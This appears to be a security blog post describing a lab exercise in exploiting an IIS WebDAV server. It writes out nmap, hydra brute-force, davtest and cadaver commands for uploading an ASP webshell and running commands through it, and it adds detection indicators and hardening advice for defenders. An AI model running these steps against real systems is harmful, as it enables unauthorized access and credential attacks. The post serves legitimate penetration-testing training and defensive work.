RS
Raj Sheth

XODA File Upload Exploitation (Lab)

A controlled lab exercise on file upload exploitation, tracking request structures and detection patterns to identify indicators for signature logic.

Tools/Skills:
Web Exploit
Pentesting
Linux
Posted on November 18, 2025

Context

  • Lab exercise. Only run against authorized targets.

  • Minimise impact. Bruteforce and uploads may cause service disruption.

Goal

Gain remote command execution by uploading and using a webshell via an IIS WebDAV-enabled site.

Tools

  • nmap (discovery, http-enum, -sV)

  • hydra (credential brute force, rate-controlled)

  • davtest (WebDAV method and upload testing)

  • cadaver (interactive WebDAV client used to upload/delete files)

  • Browser / curl (manual verification)

  • Kali lab webshells (webshell.asp etc.)

Quick findings (example)

  • Port 80 open.

  • WebDAV available at /webdav/.

  • Authentication required (e.g., Basic or NTLM).

  • PUT allowed for .asp. Uploaded .asp executed by server.

Step-by-step

  1. Initial scan

    nmap -sV -SC 10.17.12.124

    • Look for HTTP (port 80) and WebDAV indicators.

  2. Targeted HTTP enumeration

    nmap -sV --script=http-enum -p80 10.17.12.124

    • Confirms presence of /webdav/ and whether auth is required.

  3. Manual verification

    • Browse to http://10.17.12.124/webdav/.

    • Note authentication prompt and auth type.

  4. Credential access (brute force with care)

    • Use hydra with small lists and throttling to avoid DoS or lockouts.

    • Example conceptual command (tune concurrency/delay):

      hydra -L users.txt -P small-passlist.txt -s 80 -t 4 10.17.12.124 http-get /webdav/

    • Verify valid creds via browser or curl.

    Operational cautions

    • Monitor server responses.

    • Use low concurrency and slow cadence.

    • Prefer credential stuffing with vetted creds over blind large-wordlist attacks.

  5. WebDAV capability testing

    • Run davtest to enumerate allowed methods and upload behavior:

      davtest -url http://10.17.12.124/webdav/ -auth user:password

    • Confirm PUT, MOVE, DELETE permissions and accepted file extensions.

  6. Upload webshell using cadaver (lab only)

    • Start cadaver and connect to the WebDAV path. Cadaver will prompt for authentication if required:

      cadaver http://10.17.12.124/webdav/

      or include creds in the URL (lab only, for convenience):

      cadaver http://username:password@10.17.12.124/webdav/

    • Common cadaver commands:

      ls # list directory put webshell.asp # upload single file mput *.asp # upload multiple files rm webshell.asp # delete uploaded file mv oldname newname# rename/move

    • After put, verify upload with ls and by browsing to:
      http://10.17.12.124/webdav/webshell.asp and authenticating.

    Notes

    • cadaver is interactive and less noisy than some scripted uploads.

    • Use it when you need fine control over uploads and to avoid flood-style requests.

  7. Access and test webshell

    • Open uploaded .asp URL in browser with credentials.

    • Test limited commands first (whoami, ipconfig) and record outputs.

  8. Post-exploit actions

    • Collect system info within lab scope: whoami, ipconfig, net user, system files.

    • Avoid lateral movement beyond scope.

  9. Cleanup

    • Remove uploaded webshells via cadaver (rm) or HTTP DELETE.

    • Restore anything modified.

    • Document actions and findings.

Example commands (cheat-sheet)

# Discovery nmap -sV -SC 10.17.12.124 nmap -sV --script=http-enum -p80 10.17.12.124 # Safe/controlled brute force (adjust -t and list sizes) hydra -L users.txt -P small-passlist.txt -s 80 -t 4 10.17.12.124 http-get /webdav/ # Davtest (verify upload/exec) davtest -url http://10.17.12.124/webdav/ -auth username:password # cadaver interactive session cadaver http://10.17.12.124/webdav/ # then inside cadaver: # put webshell.asp # ls # rm webshell.asp

Detection indicators (for defenders)

  • Unexpected PUT / MOVE / DELETE HTTP methods in web logs.

  • New .asp or executable files under webroot.

  • Repeated failed authentication attempts from single IP.

  • Unusual user-agents associated with davtest, cadaver, hydra, or curl.

Remediation recommendations

  • Disable WebDAV if not required.

  • Restrict allowed HTTP methods and file extensions.

  • Enforce strong auth and account lockout with safe thresholds.

  • Run web apps under low-privilege accounts.

  • Implement upload filtering and AV/AVT scanning.

  • Monitor and alert on file creations and PUT/MOVE actions.

Safety & ethics

  • Written authorization required.

  • Avoid aggressive brute force or mass uploads.

  • Log time, commands, and outputs for reporting and remediation.

References

  • nmap http scripts and http-enum docs.

  • cadaver man page.

  • OWASP file upload recommendations.

  • IIS / WebDAV hardening guides.